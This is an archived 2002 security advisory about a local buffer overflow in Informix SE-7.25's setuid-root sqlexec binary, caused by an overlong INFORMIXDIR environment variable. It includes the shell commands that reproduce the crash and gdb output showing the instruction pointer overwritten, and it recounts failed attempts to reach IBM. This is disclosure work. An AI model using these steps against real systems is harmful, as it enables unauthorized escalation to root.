OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: paskcmlc.upv.es
Date: Wed May 29 2002 - 18:32:51 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----

     Title: Local Vulnerability in Informix SE-7.25
     Date: 21-04-2002
     Platform: Only tested in Linux but can be exported to others.
     Impact: Users with exec perm over /lib/sqlexec can obtain euid=0
     Author: Juan Manuel Pascual Escriba <paskuninet.edu>
     Status: Vendor contacted details below.

    PROBLEM SUMMARY:

        Buffer overflow exists if INFORMIXDIR enviroment variable is defined
    with a size greater than 2023 bytes

    [paskdimoni lib]$ ls -FAlsc
    total 2588
       4 drwxrwxr-x 2 informix informix 4096 May 28 22:50 boom/
    1484 -rwsr-sr-x 1 root informix 1515480 Apr 20 22:09 sqlexec*
     504 -rwxr-xr-x 1 informix informix 510283 Apr 20 22:09 sqlexecd*
     596 -rwxr-xr-x 1 informix informix 606041 Apr 20 22:09 sqlrm*

    [paskdimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2023'`
    [paskdimoni lib]$ ./sqlexec
    [paskdimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2024'`
    [paskdimoni lib]$ ./sqlexec
    Segmentation fault

    [paskdimoni lib]$ gdb ./sqlexec
    (gdb) r
    Starting program: /home/informix/SE-7.25/lib/./sqlexec
    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()
    (gdb)
    (gdb) info registers
    ...
    esp 0x3fffed08 0x3fffed08
    ebp 0x41414141 0x41414141
    esi 0x3fffedf9 1073737209
    edi 0x8191571 135861617
    eip 0x41414141 0x41414141
    ...

    IMPACT:
        Users with exec perm over /lib/sqlexec can obtain euid=0
    in a standard installation of Informix SE-7.25

    EXPLOIT
        Will be available when IBM develops a patch.

    STATUS
        At 21th April i tried to contact with IBM through
    http://www.ibm.com/contact,i received a quick answer
    telling me that i can email moreinfoinformix.com for
    report this vulnerability. This email address dont exist
    or is misconfigured (i received the message returned).

       At 28th May i tried to contact with IBM through
    askibmvnet.ibm.com, they answer the email telling me
    "to call to Main support Line and choose option 3 to speak
    customer service representative who will be happy to assist
    me".

    I'm sorry but im not happy to pay an international call bill.
    and im not a customer.

       Status of this advisory would be checked at:
            http://concepcion.upv.es/~pask/advisories

    - --------------------------------------------------
    This vulnerability was researched by:
    Juan Manuel Pascual Escriba paskuninet.edu

    - --

                       "In god We Trust, Others We monitor"

            ----------------------------------------------------------
                            Juan Manuel Pascual Escriba
                         Midnight Systems & Security Manager
                   PGP PubKey http://concepcion.upv.es/~pask/publica.pgp
            ----------------------------------------------------------

    -----BEGIN PGP SIGNATURE-----
    Version: PGP 6.5.8

    iQEVAwUBPPVlKDX3KWOaq4SJAQETqwf8DpQ8el1tEt/M8JA7r1xgzZdTPqrEVpRD
    besDoryOU5xSRY1waGKILxqhm9G7/81+YGjhYLBB+KRkKTqK2LjWgrmu6/SyHLXW
    hSJEoT4JjMT2rsJ1THNt8pglmqeMwAd8ncXZpSodWqByieQ6ly6uI1IcTSFViuAh
    cvpc4Pk8zORELtNmFfnNRz93dEEnWo19odX7cx0tutqJUjosI0VfCX9kKs2iRjmM
    5Fj1sGsTl1AHqcdJTmOzFQieA8ywFdS8vnEBuK6jqIHFc1Gn7e5c00K6Fu7ZFsZq
    erx8tg7F93myY0wpq5AsYiiepgWUqLMyaeb1hjRiTn/X4F5eVHbtmg==
    =4P/J
    -----END PGP SIGNATURE-----